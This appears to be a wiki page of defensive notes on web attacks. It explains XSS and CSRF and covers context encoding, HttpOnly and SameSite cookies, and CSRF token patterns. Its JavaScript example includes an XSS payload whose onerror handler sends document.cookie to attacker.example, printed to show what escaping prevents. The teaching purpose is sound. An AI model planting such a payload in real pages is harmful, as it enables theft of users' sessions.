
Website Attacks

txgz999 edited this page Aug 17, 2019 · 14 revisions

XSS: Cross-Site Scripting

An attacker injects their own script into our web page. When it runs in a victim's browser it executes with our site's origin, so it can do malicious things to our site or to our user, for example stealing the user's session or our site's data. The goal of the defence is to keep injected content from ever executing: encode untrusted data for the context it is placed in (HTML body, attribute, JavaScript, URL) instead of concatenating it into markup.

Marking the session cookie HttpOnly prevents the attacker's script from reading it through document.cookie, so an XSS payload cannot simply exfiltrate the session. It does not stop the XSS itself: the injected script still runs with the user's session and can make requests on the user's behalf, so HttpOnly mitigates one consequence of XSS and is not a fix for it.
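As an added example (not code from the original wiki page), the vulnerable concatenation beside its escaped form, and a Set-Cookie header that marks the session cookie HttpOnly. The function names, the profile page and the attacker payload are constructed for this illustration.

```javascript
// Added example, not from the original page. escapeHtml, renderProfile* and
// sessionCookie are names chosen for this illustration.

// Encode the five characters that can break out of an HTML element body or a
// double-quoted attribute. This is the defence: the data stays data.
function escapeHtml(untrusted) {
  return String(untrusted)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// Vulnerable: a user-controlled display name is concatenated straight into
// markup, so a name containing a tag becomes part of the page.
function renderProfileVulnerable(name) {
  return '<h1>Hello, ' + name + '</h1>';
}

// Hardened: the same page with the untrusted value encoded for the HTML
// body context it lands in.
function renderProfileSafe(name) {
  return '<h1>Hello, ' + escapeHtml(name) + '</h1>';
}

// Session cookie with HttpOnly, so document.cookie cannot read it. Secure and
// SameSite are the other attributes a session cookie should carry.
function sessionCookie(sessionId) {
  return 'session=' + encodeURIComponent(sessionId) +
    '; Path=/; HttpOnly; Secure; SameSite=Lax';
}

// Constructed payload, as an attacker would submit it in a profile-name field:
// a broken image whose error handler ships the cookies to the attacker.
const payload =
  '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

console.log(renderProfileVulnerable(payload)); // browser runs the onerror handler
console.log(renderProfileSafe(payload));       // browser shows the text, runs nothing
console.log(sessionCookie('abc123'));          // even if XSS runs, the cookie is unreadable
```

With the safe renderer the payload is displayed as literal text; with HttpOnly set, an XSS that does get through can still act as the user but cannot read the session value out of document.cookie.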

CSRF: Cross-Site Request Forgery

An attacker lures our user into sending a request to our website that the user did not intend, causing damage to the user or to the site. The form or script that submits the request comes from the attacker's page, but the request itself goes to our website.

The prerequisite for this attack is that the user is logged in to our website and that their identity is carried in a cookie (a session cookie) which the browser attaches to requests automatically.

It relies on the following behaviour of cookies: a cookie is sent with every request to the domain it belongs to, regardless of the origin of the document that made the request. (Modern browsers limit this with the SameSite cookie attribute: SameSite=Lax or Strict withholds the cookie from most cross-site requests. Treat it as defence in depth, not as the only protection, since older clients and some request types do not get that protection.)

Such a request can be triggered by the user clicking a hyperlink in an email they receive, or by a script or auto-submitting form that runs when the user loads an attacker-controlled page.

While we need to know what a CSRF attack can do, we also need to understand what it cannot do: because of the same-origin policy the attacker's page cannot read the response to the forged request, so CSRF lets the attacker perform actions as the user but not read our data back. That is why requests that only read data need no CSRF protection, while every state-changing request does.

CSRF Attack Solutions

  • Harsha Kavinda, Synchronizer Token Pattern: when the user logs in, generate an unguessable random token and store it in the server-side session. In every form sent to the user, include that value in a hidden field. When the form is submitted, check that the hidden field matches the session value (using a constant-time comparison) and reject the request if it is missing or different.
  • Harsha Kavinda, Double Submit Cookie Pattern: when the user logs in, generate a token and set it in a cookie. In every form sent to the user, include the cookie value in a hidden field. When the form is submitted, check that the hidden field matches the cookie value. The attacker's page can make the browser send the cookie but cannot read its value, so it cannot fill in the hidden field. This pattern needs no server-side state, but it is weaker than the synchronizer token if an attacker can set cookies for our domain (for example from a compromised subdomain).
